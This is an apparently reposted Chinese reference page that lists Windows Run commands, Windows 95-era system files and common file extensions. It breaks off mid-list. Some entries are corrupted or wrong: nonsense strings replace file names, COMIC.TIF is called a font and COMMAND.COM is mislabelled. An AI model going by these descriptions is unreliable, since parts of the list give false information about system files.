regsvr32 /u *.dll----===============停止dll文件运行 regsvr32 /u zipfldr.dll------=====取消zip支持 cmd.exe--------=================cmd命令提示符 chkdsk.exe-----====================chkdsk磁盘检查 ceryesgr.msc----=====================证书管理实用程序 calc-----------==============启动计算器 charmap--------=================启动字符映射表 cliconfg-------==================sql server 客户端网络实用程序 clipbrd--------=================剪贴板查看器 conf-----------==============启动 compmgmt.msc---======================计算机管理 cleanmgr-------==================垃圾整理 ciadv.msc------===================索引服务程序 osk------------=============打开屏幕键盘 odbcad32-------==================odbc数据源管理器 oobe/msoobe /a----==================检查xp是否激活 lusrmgr.msc----=====================本机用户和组 logoff---------================注销命令 iexpress-------==================木马捆绑工具，系统自带 nslookup-------==================ip地址侦测器 fsmgmt.msc-----====================共享文件夹管理器 utilman--------=================辅助工具管理器 Windows系统文件解析 2009-02-08 12:56:39 被27人转藏 | 小贴士:我很喜欢这个口袋，我能订阅它么? Windows系统文件解析 对于Windows操作系统中的系统文件你知道他们都有什么用途吗,下面的文章中我们就详细介绍相关识 别。 A ? ACCESS.CHM - Windows帮助文件 ACCSTAT.EXE - 辅助状态指示器 ADVAPI32.DLL - 高级Win32应用程序接口 AHA154X.MPD - SCSI驱动程序 AM1500T.VXT - 网卡驱动程序 AM2100.DOS - 网卡驱动程序 APPSTART.ANI - 动画光标 APPS.HLP - Windows帮助文件 AUDIOCDC.HLP - "易码编码解码器"帮助文件 AWARDPR32.EXE - 增加打印机工具 B ? BIGMEM.DRV - BIGMEM虚拟设备 BILLADD.DLL - 动态链接库(支持MSW) BIOS.VXD - 即插即用BIOS接口 BUSLOGIC.MPD - SCSI驱动程序 C ? CALC.EXE - 计算器应用程序 CANNON800.DRV - 佳能打印机驱动程序 CHOICE.COM - MSDOS命令 CHS16.FON - 字体文件(16点阵中文) CANYON.MID - MIDI文件例子 CARDDRV.EXE - PCMCIA支持程序 CDFS.VXD - CDROM文件系统 CDPLAYER.EXE - CD播放器应用程序 CDPLAYER.HLP - CD播放器帮助文件 CHIPS.DRV - 芯片技术显示驱动程序 CHKDSK.EXE - DOS磁盘检查工具 CHOOSUSR.DLL - 网络客户 CHOKD.WAV - 声音文件例子 CIS.SCP - 脚本文件(演示如何建立与Compuserve的PPP连接) CLAIRE~1.RMI - MINI序列 CLIP.INF - 安装信息文件(剪粘板查看器) CLOSEWIN.AVI - 影片剪辑(AVI)(如何关闭窗口) CMC.DLL:Mail - API1.0公共信息调用 COMBUFF.VXD - COM端虚拟设备 COMCTL32.DLL - 32位Shell组件 COMDLG32.DLL - 32位公共对话库 COMIC.TIF - TrueType字体文件(Comic Sans Ms) COMMAND.COM - 公共对话库 COMMDLG.DLL - 16位公共对话库 COMMON.HLP - OLE帮助文件 COMPOBJ.DLL - OLE16/32互*作库 CONAGEN.EXE - 32位控制支持 CONFAPI.DLL - Microsoft网络组件 CONFIG.SYS - 配置文件 CONFIG.TXT - 自述文件(配置文件中如何使用命令) CONTROL.EXE - "控制面板"应用程序 COOL.DLL - 统一资源定位文件 COPY.INF - 安装信息文件 CP-1250.NLS - 自然语言支持文件 CPQNDIS.DOS - 网卡驱动程序 CPQNDIS3.VXD - Compaq以太控制器NDIS驱动程序 CR3240.EXE - DOS6.22中文版CR3240打印机驱动程序 CRTDLL.DLL - Microsoft C运行时间库 CSETUP.EXE - MSDOS6.22中文设置程序 CSETUP.WIN - CSetup.exe支持文件 CSMAPPER.SYS - 系统文件(支持PCMCIA) CSPMAN.DLL - 动态链接库(SoundBlaster 16 Driver) CTRLPAN.EXE - MSDOS命令(系统控制台程序) CTRLPAN.EXE - MSDOS6.22中文版控制程序 D ? DBLBVFF.SYS - 双缓冲驱动程序 DC21X4.SYS - NDIS3驱动程序 DCIMAN.DLL - 显示控制接口 DCIMAN32.DLL - 显示控制接口 DDEML.DLL - DDE信息库 DEBMP.DLL - 光栅显示设备 DEBUG.EXE - Debug调试工具 DECPSMW4.INF - 安装信息文件(DEC打印机安装) DECLAN.VXD - DECLAN网卡驱动程序 DEFRAG - 打开"选定驱动器"窗口 DEL.INF - 安装信息文件 DELTEMP.COM - 初始化帮助工具 DELTREE.EXE - 删除目录工具 DEMET.DLL - 向量显示工程 DESKCP16.DLL - 16位桌面控制面板 DESKTOP.MSN - Microsoft网络组件 DESS.DLL - 表格显示工程 DEWP.DLL - 字处理显示工程 DIALER.CNT - 对话帮助 DIALER.EXE - 电话拨号程序 DIALER.HLP - 电话拨号帮助文件 DIALMON.EXE - 拨号监视程序(IE2.0) DIBENG.DLL - 独立设备的位同工程 DICONIX.DRX - 打印机驱动 非常棒哦^__^.WAN - 声音文件例子 DIRECTCC.EXE - 直接线缆连接应用程序 DISKCOMP - 磁盘比较工具 DISKCOPY.COM - 磁盘拷贝工具 DISKDRV.INF - 安装信息 DISPLAY.TXT - 显示卡README文件 DMCOLOR.DLL - 通用打印驱动程序彩打支持库 DOSKEY.COM - DOS命令 DOSX.EXE - MSDOS配置程序 DRAGDROP.AVI - 影片剪辑(AVI)(如何使用拖拽) DRIVER.SYS - DOS驱动程序 DRVSPACE.EXE - 磁盘压缩工具 DRVSPACE.HLP - 磁盘空间管理帮助文件 E ? EDIT.COM - DOS文字编辑程序 EDLIN.EXE - DOS行编辑器 EE16.VXD - 虚拟设备驱动程序 EISA.VXD - 即插即用EISA总线计数器 EK550C.ICM - 打印机简介 EMM386.EXE - 扩展内存管理程序 ENABLE.INF - 初始化信息 ENGCT.EXE - MSN支持文件 ESCP24SC.DRV - 设备驱动程序 EUDCEDIT.CNF - 帮助索引文件(造字程序) EUDCEDIT.EXE - 造字程序 EUDCEDIT.HLP - 帮助文件(造字程序) EUDCEDIT.INF - 安装信息文件(造字程序) EVX16.DOS - 网卡驱动程序 EWRK3.DOS - 网卡驱动程序 EWRK3.SYS - 网卡驱动程序 EXCEL.XLS - Excel5.0文件模板 EXCEL4.XLS - Excel4.0文件模板 EXCHANGE.TXT - Inbox和Exchange的自述文件 EXCHNG.CNT - Mail/Exchange帮助文件内容 EXCHNG.HLP - Mail/Exchange组件 EXCHNG32.EXE - 对用户的交换机作初始设置 EXPLORER.AVI - 影片剪辑(AVI)(如何使用资源管理器) EXPLORER.EXE - "资源管理器"应用程序 EXPO.HLP - 帮助文件(产品信息) EXPOSTRT.EXE - 产品信息应用程序 EXTRACT.EXE - 解压缩工具 EXTRA.TXT - 自述文件(联机访问附加文件) F ? FAQ.TXT - 疑难解答自述文件 FAXCODEC.DLL - 传真编码/译码器 FAXCOVER.EXE - 封面编辑器 FC.EXE - DOS命令,比较两个文件 FD16-700.MPD - SCSI驱动程序 FD8XX.MPD - SCSI驱动程序 FDISK.EXE - DOS命令,在硬盘上建立、删除及显示当前分区 FILESEC.VXD - 文件存取控制管理器 FILEXFER.CNT - 文件传输帮助文件内容 FILEXFER.EXE - Microsoft文件传输 FIND.AVI - 影片剪辑(如何使用查找) FIND.EXE - 寻找指定字符串命令 FINDMVI.DLL - 媒体视觉支持 FINSTALL.DLL - 字库安装程序 FINSTALL.HLP - 字库安装帮助文件 FLSIMTD.VXD - PCMCIA支持 FLSIMTD.VXD - PCMCIA支持 FONT16.EXE - DOS6.22中文版16点阵字体驱动程序 FONTS.INF - 字体选择初始化信息 FONTVIEW.EXE - 字体浏览程序 formAT.COM - DOS磁盘格式化工具 FOUTLINE.EXE - 轮廓字体驱动程序 FRAMEBUF.DRV - SVGA显示器驱动程序 FTE.DLL - 声音浏览文件传输工程文件 FTP.EXE - 文件传输协议TCP工具 FURELI~1.RMI - MINI序列 G ? GBK.TXT - 中文Windows95GBK代码集字符定义表 GDI.EXE - 简版WIN3.1图形界面 GDI32.DLL - 32位GDI图形界面 GENERAL.IDF - 一般MIDI指示器 GRPCONV.EXE - Windows程序组转换器 GUIDE.EXE - 应用程序(MSN) H ? HARDWARE.TXT - 硬件自述文件 HOSTS.SAM - TCP配置 HPCLRLSK.ICM - 打印简介 HPDESK.ICM - 打印机简介表 HPDSKJET.DRV - 打印机驱动程序 HPEISA.VXD - 网络适配器驱动程序 HPJAHLP.CNT - JetAdmin程序帮助文件 HPJD.DLL - HPJetAdmin支持程序 HPLAN.DOS - 网络适配器驱动程序 HPLJ300.DRV - HPLJ300DPI打印机驱动程序 HPLJ300.EXE - MSDOS命令(HP打印机驱动) HPLJ-31.SPD - 打印机驱动程序 HPLJ600.DRV - HPLJ600DPI打印机驱动程序 HPLJP-V4.INF - 打印机安装信息 HPNETPRN.INF - HPJetAdmin支持程序 HPPJXL31.SPD - 打印机驱动程序 HPPLOT.DRV - 打印机驱动程序 HPPLOT.HLP - 打印机驱动程序帮助文件 HPPRARBK.DLL - HPJetAdmin支持程序 HPPRARRK.HLP - HPJetAdmin支持程序帮助文件 HPVCM.HPM - 打印机驱动程序 HSFLOP.PDR - HSFLOP虚拟设备 HTICONS.DLL - 终端设备动态链接库 HYPERTRM.CNT - 终端设备帮助文件 HYPERTRM.EXE - 终端设备应用程序 HYPERTRM.HLP - "超级终端"帮助 HZKBD.EXE - 常用输入方法程序 HZVIO95.EXE - 显示驱动程序 I ? I82593.DOS - 网络适配器驱动程序 IB401917.SPD - 打印机驱动程序 IBM20470.SPD - 打印机驱动程序 IBM20K.DOS - 网络适配器驱动程序 ICM32.DLL - 图象颜色匹配程序 ICMOI.DLL - 用户界面颜色匹配程序 ICONLIB.DLL - 图符库 IEXPLORE.CNT - 帮助索引文件(IE) IEXPLORE.EXE - InternetExplore IEXPLORE.HLP - 帮助文件(IE) IFSHLP.SYS - 文件系统安装帮助文件 IFSMGR.VXD - 文件系统安装管理程序 IMAGEOIT.EXE - 图象编辑器光标程序 IMCLIENT.DLL - Microsoft网络组件 IME.CNT - 帮助索引文件(中文输入法) IME.HLP - Windows帮助文件 IME.INF - 安装信息文件(中文输入法) IMEGEN.CNF - 帮助索引文件(输入法生成器) IMEGEN.EXE - 输入法生成器 IMEGEN.HLP - 帮助文件(输入法生成器) IMEINFO.INI - 输入法初始化文件 IMM32.DLL - WIN32IMM应用程序界面 INBOX.EXC - 邮件组件 INDICDLL.DLL - 多语言组件 INET.TXT - IE自述文件 INET16.DLL - 动态链接库(支持IE2.0) INETAB32.DLL - 动态链接库(支持Internet mail) INETCFG.DLL - 动态链接库(支持IE2.0) INETCPL.CPL - 控制面板文件(配置IE2.0) INETMAIL.INF - 安装信息文件(Internet mail) INETWIZ.EXE - Internet安装向导 INformS.WPF - 样板文件 INSTBE.BAT - Microsoft网络组件 INSTDICT.EXE - MSDOS命令(输入法安装程序) INTB.VXD - 13号中断虚拟设备 INTL.CPL - 控制面板 INT-MAIL.CNT - 帮助索引文件(Internet mail) IOS.INI - 设置需要安全保护的程序 IOSCLASS.DLL - CDROM安装程序 IRMATR.DOS - 网络适配器驱动程序 ISAPNP.VXD - ISA总线即插即用程序 J ? JOY.CPL - 游戏杆控制面板 JOYSTICK.INF - 多媒体安装信息 JP350.DRV - 打印机驱动程序 JUNGLE~1.WAV - 声音文件 K ? KBDBE.KBD - 比利时键盘格式 KBDBR.KBD - 巴西键盘格式 KBDCA.KBD - 法国、加拿大键盘格式 KBDOS.KBD - 美国键盘格式 KDCOLOR1.SPD - 打印机驱动程序 KERNEL32.DLL - 32位内核 KEYB.COM - 将控制键盘程序装入内存 KODAKCE.ICM - 柯达ICC配置文件 KRNL386.EXE - Core应用程序 L ? LABEL.EXE - DOS命令,设置磁盘名称 LFNBK.EXE - 长文件名备份文件 LFNBK.TXT - LFNBK的自述文件 LICENSE.HLP - Windows帮助文件 LMSCRIPT.EXE - LAN管理器文稿处理程序 LOGIN.EXE - Win95登录NetWare文件 LQ1600K.EXE - LQ1600K打印驱动程序 M ? MAILMSG.DLL - 微软网络组件 MAILOPT.INF - MAIL/MAPI设置文件 MAPI.DLL - Mail/Exchange组件 MCIAVI.DRV - 多媒体驱动程序 MCICDA.DRV - MCICD声音驱动程序 MCIOLE.DLL - MCIOLE句柄 MCIPIONR.DRV - MCI光盘驱动程序 MCISEQ.DRV - MCI定序器驱动程序 MCIVISCA.DRV - MCIVCR驱动程序 MCIWAVE.DRV - MCI Ware驱动程序 MDMNOKIA.INF - 安装信息文件(modem) MDMNOVA.INF - 安装信息文件(modem) MDMVV.INF - 安装信息文件(modem) MEMMAKER.EXE - 内存管理程序 MEMMAKER.INF - 内存管理程序设置信息 MFCUIA32.DLL - OLEI公共对话动态链接库 MIDI.INF - 即插即用MIDI设备信息 MINET32.DLL - 支持Internet Mail动态链接库 MKECR5XX.MPD - SCSI驱动程序 ML3XEC16.EXE - 应用程序(MAPI) MLSHEXT.DLL - 微软核扩展库 MMCI.DLL - 媒体类安装程序 MMDEVLDR.VXD - 即插即用设备装载程序 MMDRV.HLP - 多媒体帮助文件 MMSOUND.DRV - 多媒体驱动程序 MMSYSTEM.DLL - 多媒体系统内核 MMTASK.TSK - 多媒体背景任务交换器 MODE.COM - DOS命令 MODERN.FON - 字体文件(modem) MORE.COM - DOS命令 MOUSE.DRV - 鼠标驱动程序 MOVEWIN.AVI - 影片剪辑(如何移动窗口) MPLAYER.EXE - 媒体播放程序 MPR.DLL - WIN32网络接口动态链接库 MSAB32.DLL - 微软网络地址簿 MSBASE.INF - 设置信息 MSCDEX.EXE - DOS MSCDEX CDROM扩展工具 MSCDROM.INF - 类安装设置信息 MSD.EXE - 微软诊断工具 MSD.INI - 微软诊断初始化 MSDET.INF - 系统检测设置信息 MSDISP.INF - 显示设置信息 MSDLG.EXE - 数据链接控制协议 MSDOS.INF - 设置信息 MSDOSDRV.TXT - 设备驱动程序自述文件 MSFT.VRL - 统一资源定位文件 MSGSRV32.EXE - Windows32位虚拟设备信息系统 MSHDC.INF - 硬盘控制设置信息 MSJSTICK.DRV - 即插即用游戏杆驱动程序 MSMAIL.INF - Mail/MAPI初始化 MSMOUSE.INF - 鼠标设置信息 MSN.TXT - 微软网络自述文件 MSNET32.DLL - 微软32位网络API库 MSNEXCH.EXE - 微软网络设置程序 MSNPSS.HLP - 微软网络帮助文件 MSNVER.TXT - 微软网络帮助信息 MSPAINT.EXE - 画图工具 MSPCIC.DLL - PCMCIA类安装与控制工具 MSPORTS.INF - 公共设置信息 MSPP32.DLL - 微软网络打印支持程序 MSPWL32.DLL - 口令清单管理库 MSSBLST.DRV - 声霸卡驱动程序 MSSBLSI.VXD - 声霸卡驱动程序 MSSHRVI.DLL - 共享内核扩展程序 MSSNDSYS.DRV - Windows声音系统驱动程序 MSSP.VXP - Windows NT安全支持 MSTCP.DLL - TCP用户界面 MSVIEWUT.DLL - 显示设备服务数据链接库 MTMMINIP.MPD - SCSI驱动程序 MULLANG.INF - 多种语言字体支持设置信息 MVIWAVE.DRV - 声音驱动程序 N ? NBTSTAT.EXE - TCP工具 NDDEAPI.DLL - Workgroups DDE共享接口 NDDENB.DLL - 微软网络DDE NetBIOS接口 NDISHLP.SYS - 实模式NDIS支持驱动程序 NET.EXE - 实模式网络客户软件 NET.INF - 网络检测信息 NET.MSG - 网络客户信息 NET3COM.INF - 网络设置信息 NETAMD.INF - 网络设置信息 NETAPI.DLL - 网络应用程序接口动态链接库 NETAPI32.DLL - 32位网络API动态链接库 NETAVXT.INF - MS内部传输文件 NETBEUI.VXD - 32位NetBEUI协议 NETBIOS.DLL - NetBIOSAPI库 NETDCA.INF - 安装信息文件 NETDDE.EXE - Windows网络动态数据交换 NETDET.INI - NetWare检测文件 NETDI.DLL - 网络设备安装 NETH.MSG - 网络客户帮助信息 NETOS.DLL - NOS检测DLL NETWATCH.EXE - 网络观测程序 NETWORK.TXT - 网络信息自述文件 NOTEPAD.EXE - 记事本应用程序 NODRIVER.INF - 即插即用设备信息 NOTEPAD.EXE - NOTEPAD文件 NSCL.VXD - NSCL虚拟设备 NW16.DLL - NetWare客户 NWAB32.DLL - 地址簿支持动态链接库 NWLSCON.EXE - 登录文稿控制台程序 NWLSPROC.EXE - NetWare登录处理器 NWNET32.DLL - NetWare客户 NWNP32.DLL - NetWare组件 NWREDIR.VXD - NetWare重定向 NWSERVER.VXD - NCP服务 NWSP.VXD - NCP服务安全提供 O ? OEMREVA.INF - 安装信息文件 OLE2.DLL - OLE2.0动态链接库 OLE2.INF - OLE设置信息 OLE32.DLL - 32位OLE2.0组件 OLEAUT32.DLL - OLE2-32自动化 OLECL1.DLL - 对象链接与嵌入客户库 OLEDLG.DLL - Windows OLE2.0用户接口支持 OLESVR.DLL - 对象链接与嵌入服务端库 OLETHK32.DLL - OLE形实替换程序库 P ? PACKAGER.EXE - 对象包装程序 PARALINK.VXD - 远程网络存取并行口驱动程序 PBRVSH.EXE - "画图"应用程序 PDOS95.BAT - 进入中文DOS状态 PERF.VXD - 系统性能监视器 PIFMGR.DLL - 程序信息文件管理服务程序 PING.EXE - TCPPing工具 PMSPL.DLL - LAN管理应用程序接口 POWER.DRV - 高级电源管理驱动程序 PPPMAC.VXD - Windows虚拟PPP驱动程序 PRINT.EXE - DOS打印文件 PRINTERS.TXT - 打印信息自述文件 PROGMAN.EXE - 程序管理器 PRTVPD.INF - 打印机升级设置信息 Q ? QUIKVIEW.EXE - 快速查看 QUIT.EXE - 退出中文DOS状态 R ? README.TXT - Windows95自述文件 REGEDIT.EXE - 注册编辑器 REGSERV.EXE - 远程注册 REGWIE.EXE - 注册工具 REGSERV.INF - 远程注册 RESTORE.EXE - DOS命令 RNAAPP.EXE - 拨号网络应用程序 RNASERV.DLL - 远程网络存取服务 RNASETUP.DLL - 远程网络存取设置动态链接库 RNATHUNK.DLL - 远程网络存取转换支持动态链接库 RNAUI.DLL - 远程网络存取用户接口DLLRNDSRV32.DLL复制服务程序 ROBOTZCL.WAV - 声音文件 ROBOTZWI.WAV - 声音文件 ROMAN.FON - 字型文件 ROUTE.EXE - TCP/IP ROUTE命令 RPCLTC1.DLL - 远程调用库 RPCNS4.DLL - 远程调用库 RPCPP.DLL - 远程调用打印驱动 RPCRT4.DLL - 远程调用库 RPCSS.EXE - 远程调用结点映象 RPLBOOT.SYS - 远程程序装入 RPLIMAGE.DLL - 远程程序装入磁盘映象器 RSRC16.DLL - 资源计量器 RSRCMTR.EXE - 资源计量器 RSRCMTR.INF - 资源计量器 RUMOR.EXE - DDE测试/游戏 RUNDLL.EXE - 把DLL作为应用程序运行 RUNDLL32.EXE - 32位壳组件 S ? S3.DRV - S3显示驱动 S3.VXD - S3虚拟设备 SACLIEN.DLL - Microsoft网络组件 SAMPLEVIDEOS - 图象文件 SAPNSP.DLL - Winsock数据连接库 SAVE32.COM - 安装时所需的TSR文件 SB16.VXD - 16位声卡虚拟设备 SB16SND.DRV - 16位声卡驱动 SBAWE.VXD - AWE声卡虚拟设备 SBAWE32.DRV - AWE声卡驱动 SBFM.DRV - 16位声卡驱动 SCANDISK.BAT - MSDOS6.x Scandisk的替代存根模块SCANDISK.BAT磁盘诊断工具 SCANDISK.INI - 磁盘诊断工具 SCANDISK.PIF - 安装磁盘诊断工具时的PIF文件 SCANDSKW.EXE - 磁盘扫描工具 SCANPROG.EXE - 磁盘扫描工具 SCRNSAVE.SCR - 屏幕保护 SCSI.INF - SCSI安装文件文件名描述 SCSIIHLP.VXD - SCSI支持文件 SCSIPORT.PDR - SCSI虚拟设备口 SECUR32.DLL - Microsoft Win32安全服务 SECURCL.DLL - Microsoft网络组件 SEIKO24E.DRV - 打印机驱动 SEIKOSH9.DRV - 打印机驱动 SERIAL.VXD - 串口VCOMM驱动器 SERIFE.FON - 字型文件 SERVER.HLP - 服务器帮助文件 SE小乖IR.EXE - SBS文件 SETUP.BIN - 安装支持文件 SETUP.BMP - 安装Wash位图文件 SETUP.EXE - Windows95安装程序 SETUP.INF - 安装信息文件 SETUP.TXT - 安装时的README文件 SETUP4.DLL - 安装支持文件 SETUPPP.INF - 安装信息 SETUPX.DLL - 安装支持 SETVER.EXE - MSDOS版本显示,该程序可在网络上执行 SF4029.EXE - 打印机驱动 SHARE.EXE - MSDOS共享实用程序 SHELL.INF - 安装壳信息 SHELL.VXD - 虚拟壳设备 SHELL2.INF - 颜色组合 SHELL3.INF - 颜色组合 SIZE1-1.CUR - 光标 SIZE1-M.CUR - 光标 SIZE4-M.CUR - 光标 SIZENESW.ANI - 活动光标 SIZEWE.ANI- 活动光标 SKPSFA-1.SPD - 打印机驱动 SLAN.DOS - 网络适配器驱动 SLCD32.MPD - SCSI驱动器 SLENH.DLL - 高级节能选项 SMALLE.FON - 字型文件 SMALLF.FON - 字型文件 SMARTDRV.EXE - 超高速缓存程序 SMARTND.DOS - 网络适配器驱动器 SMC3000.DOS - 网络适配器驱动器 SMC9000.VXD - 网络适配器驱动器 SNAPSHOT.EXE - 抽点 SNAPSHOT.VXD - 抽点虚拟设备 SNDREC32.EXE - 录音机 SNIP.VXD - 网络适配驱动器 SOCKET.VXD - Windows虚拟Socket网卡驱动器SOCKET.VXD PCMCIA支持 SOL.CNT - 纸牌游戏 SOL.HLP - 纸牌游戏帮助文件 SORT.EXE - MSDOS分类实用程序 SOUNDREC.CNT - 录音机帮助文件内容 SOUNDREC.HLP - 录音机帮助文件 SPARROW.WPD - SCSI驱动器 SPARROWX.MPD - SCSI驱动器 SPOOL32.EXE - 打印机支持 SPOOLER.VXD - 打印机共享虚拟设备 SRAMMTD.VXD - PCMCIA支持 SSERIFE.FON - 字型文件 SSERIFF.FON - 字型文件 SSFLYWIN.SCR - 屏幕保护 SSSTARS.SCR - 屏幕保护 STAR24E.DRV - 打印机驱动 STAR9E.DRV - 打印机驱动 START.EXE - 启动程序 STATE.PBK - Microsoft网络组件 STDOLE.TLB - OLE2.0文件 STDOLE32.TLB - OLE2-32文件 STEMO409.DLL - Windows95帮助文件的DLL STLSO4SS.SPD - 打印机驱动程序 STLS577U.SPD - 打印机驱动程序 STORAGE.DLL - OLE存储器管理库 STRN.DOS - 网络适配器驱动 SUBST.EXE - MSDOS Subst实用程序 SUEXPAND.DLL - LZ DLL安装 SUHELPER.BIN - 安装支持 SUPERVGA.DRV - 高级VGA显示驱动 SURPORT.TXT - PSS支持信息 SVCPROP.DLL - Microsoft网络组件 SVRAPI.DLL - 32位公用服务器API实用程序 SXCIEXT.DLL - Matrox显示驱动支持文件 SYMBOLE.FON - 字型文件 SYS.COM - MSDOS系统实用程序 SYSCLASS.DLL - 系统类库安装 SYSDETMG.DLL - 系统检测库 SYSEDIT.EXE - 系统编辑器 SYSLOGO.RLE - 系统标识 SYSMON.EXE - 系统监控程序 SYSMON.HLP - 系统监控帮助 SYSTEM.DRV - 最小Win3.1标准模式 SYSTHUNK.DLL - Windows系统形实替换程序库 SYSTRAY.EXE - 高级节能管理 T ? T128.MPD - SCSI驱动器 T160.MPD - SCSI驱动器 T20N3.VXD - 网络适配驱动器 T30ND.DOS - 网络适配驱动器 T338.MPD - SCSI驱动器 TADA.WAV - 声音文件 TAPI.DLL - API通话程序 TAPI.INF - API通话安装信息文件 TAPI32.DLL - 32位形实替换 TAPIADDR.DLL - API通话程序 TAPIEXE.EXE - API通话组件 TAPIINI.EXE - API通话组件 TASKMAM.EXE - 任务管理器 TCCARC.DOS - 网络适配驱动器 TCTOKCH.VXD - 网络适配驱动器 TELEPHON.CPL - 通话帮助 TESTPS.TXT - PostScript测试 TEXTCHAT.EXE - Microsoft网络组件 THEMIC-1.WAV - 声音文件 THINKJET.DRV - 打印机驱动 THREED.VBX - Windows95浏览 T1850.DRV - 打印机驱动 TIMEDATE.CPL - 时间/日期控制面板 TIMES.TTF - 时间字型 TIMESBD.TTF - 时间粗体字型 TIMESBI.TTF - 时间粗斜体字型 TIMESI.TTF - 时间斜体字型 TIMEZONE.INF - 安装信息 TIMLP232.SPD - 打印机驱动 TIPS.txt - 提示和技巧自述文件 TKPHZR32.SPD - 打印机驱动 TLNK.DOS - 网络适配驱动器 TLNK3.VXD - 网络适配驱动器 TMV1.MPD - SCSI驱动器 TOOLHELP.DLL - 16位开发工具帮助器 TOSHIBA.DRV - 打印机驱动 TOUR.EXE - 浏览文件 TPHAIII.ICM - 打印机简介 TRACERT.EXE - TCP/IP IRACEROUTE命令 TREE.COM - MS DOS树实用程序 TREEEDCL.DLL - Microsoft网络组件 TREENVCL.DLL - Microsoft网络组件 TRIUMPHI.SPD - 打印机驱动 TSD32.DLL - 声音压缩管理器 TSENG.DRV - ET4000W32显示驱动 TTY.DRV - 打印机驱动 TTY.HLP - TTY打印机驱动帮助 TYPELIB.DLL - OLE2.0 U ? U9415470.SPD - 打印机驱动 UBNEI.DOS - 网络适配器驱动 ULTRA124.MPD - SCSI驱动器 ULTRA24F.MPD - SCSI驱动器 UMDM16.DLL - 通用调制解调器驱动组件 UMDM32.DLL - 通用调制解调器驱动组件 UNIDRV.DLL - Microsoft通用打印机驱动库 UNIDRV.HLP - 通用打印机驱动帮助 UNIMODEM.VXD - 通用调制解调器驱动 USER32.DLL - 32位用户 V ? V86MMGR.VXD - V86MMGR虚拟设备 VCACHE.VXD - VCache虚拟设备 VCD.VXD - 虚拟COM驱动程序 VCOMM.VXD - VCOMM驱动程序 VCOND.VXD - Win32控制台 VDMAD.VXD - VDMAD虚拟设备 VER.DLL - 小型Win3.1安装程序16位版动态链接库 VER.NEW - 版本检测与文件安装库 VERSION.DLL - 32位版本动态链接库 VERX.DLL - 安装程序使用的版本动态库 VFAT.VXD - VFAT文件系统 VFD.VXD - 软盘虚拟设备 VFLATD.VXD - 虚拟平板帧缓存虚拟设备 VGA.DRV - VGA显示驱动程序 VIDCAP.INF - 即插即用VCD信息 VIDEOT.VXD - 视频虚拟设备 VIP.386 - TCP/IP虚拟IP设备 VJOYD.VXD - 游戏棒虚拟设备 VKD.VXD - 虚拟键盘设备 VLB32.DLL - Mail/Exchange组件 VMD.VXD - Win3.1虚拟鼠标驱动程序 VMM.VXD - 虚拟存储管理设备 VMM32.VXD - 虚拟存储管理设备 VMOUSE.VXD - 虚拟鼠标驱动程序 VNBT.386 - NetBIOS传输驱动程序 VNETBIOS.VXD - VNETBIOS虚拟设备 VNETSUP.VXD - 网络支持虚拟设备 VPD.VXD - 虚拟LPT驱动程序 VPICD.VXD - 虚拟可编程干扰控制器设备 VPOWERD.VXD - 高级电源管理虚拟设备 VREDIR.VXD - Microsoft网络32位客户端程序 VSAMI.DLL - AMI文件语法分析程序 VSASC8.DLL - ASCII文件语法分析程序 VSBMP.DLL - BMP文件语法分析程序 VSERVER.VXD - Microsoft网络32位服务器端程序 VSGIF.DLL - GIF文件语法分析程序 VSHARE.VXD - 32位共享虚拟设备驱动程序 VSMSW.DLL - Win写文件语法分析 VSPP.DLL - PowerPoint语法分析程序 VSRTF.DLL - RTF文件语法分析程序 VSTIFF.DLL - TIFF文件语法分析程序 VSW6.DLL - Word6文件语法分析程序 VSWORD.DLL - Word文件语法分析程序 VSWP5.DLL - WordPerfect5文件语法分析程序 VSXL5.DLL - Excel文件/图表语法分析程序 VTCP.386 - TCP/IP虚拟TCP驱动程序 VTDAPI.VXD - VTDAPI虚拟设备 VTDI.386 - 传输驱动接口支持程序 VXDLDR.VXD - 虚拟设备驱动程序装载器 W ? WAVE.INF - 即插即用音波设备信息 WDTOOOEX.MPD - SCSI驱动 WGPOADMN.DLL - Mail/Exchange组件 WHLP16T.DLL - 帮助动态链接库 WIN87EM.DLL - 80387数学仿真库 WINABC.HLP - 智能ABC帮助文件 WINBX.HLP - 表形码输入法帮助文件 WINCHA.HLP - 繁体仓颉输入法帮助文件 WINDOWS.CNT - Windows95帮助文件内容 WINDOWS.HLP - Windows95帮助文件 WINFILE.CNT - 文件管理器帮助文件内容 WINFILE.EXE - Windows工作组文件管理器 WINFILE.HLP - 文件管理器帮助文件 WINGB.HLP - 区位码输入法帮助文件 WINHLP23.HLP - Windows帮助文件 WINIME.HLP - *作指南帮助文件 WINNM.HLP - GBK内码输入法帮助文件 WININIT.EXE - Windows初始化文件 WINIPCFG.EXE - TCP/IP配置工具 WINNEWS.TXT - Winnews信息 WINPHO.HLP - 繁体注音输入法帮助文件 WINPOPUP.EXE - POPUP工具 WINREG.DLL - 远程注册支持 WINPY.HLP - 全拼输入法帮助文件 WINSOCK.DLL - Windows的套接API WINSY.HLP - 双拼输入法帮助文件 WINXSP.HLP - GBK双拼输入法帮助文件 WINXZM.HLP - GBK郑码输入法帮助 WINZM.HLP - 郑码输入法帮助文件 WNASPI32.DLL - Windows DLL32位ASPI WPSUNI.DRV - 传真驱动程序 WPSUNIRE.DLL - WPS主机资源执行程序 X ? XCOPY.EXE - DOS XCOPY工具 XCOPY32.EXE - 文件拷贝程序 XGA.DRV - XGA显示驱动程序 Windows常用文件扩展名解析 2009-02-08 12:55:42 被32人转藏 | 小贴士:你不理财，财不理你:理财从头学起 Windows常用文件扩展名解析 扩展名 文件类型 打开方式 .aiff 声音文件 Windows media Player .!!! Netants 暂存文件 Netants .ani 动画鼠标 .arj 压缩文件 ARJ .avi 电影文件 Windows media Player .awd 传真文档 .bak 备份文件 .bas Basic 语言 Basic .bat DOS批处理文件 .bin MAC 二进制码文件 Stuffit Expander .bmp 图象文件 画图/看图软件 .cab 压缩文件 Winzip .cdr Corel图画文件 Corel Draw .chk Scandisk检察后制作的文件 可以删掉 .com DOS命令文件 自执行 .cpx Cryptapix加密图片文件 Cryptapix .cur 静态鼠标 .dbf 数据库文件 dBase, FoxBase, Access .dll 应用程序扩展 .doc 文档文件 Word .dwg AutoCAD文件 AutoCAD .eps Illustrator 图画文件 Adobe Illustrator .exe 执行文件 自执行 .fon 字体文件 .gb 国标码文件 南极星文字处理 .get Getright 暂存文件 .gif 256色图象文件 画图/看图软件 .gz 可供UNIX或LINUX使用的压缩文件 Winzip .hqx Macintosh 文件 Stuffit Expander .htm 网页 浏览器 .html 网页 浏览器 .ico 图标 .ini 配置设置 笔记本或WordPad .ipx IPX演示文件 浏览器加装IPX 插件 .jiff 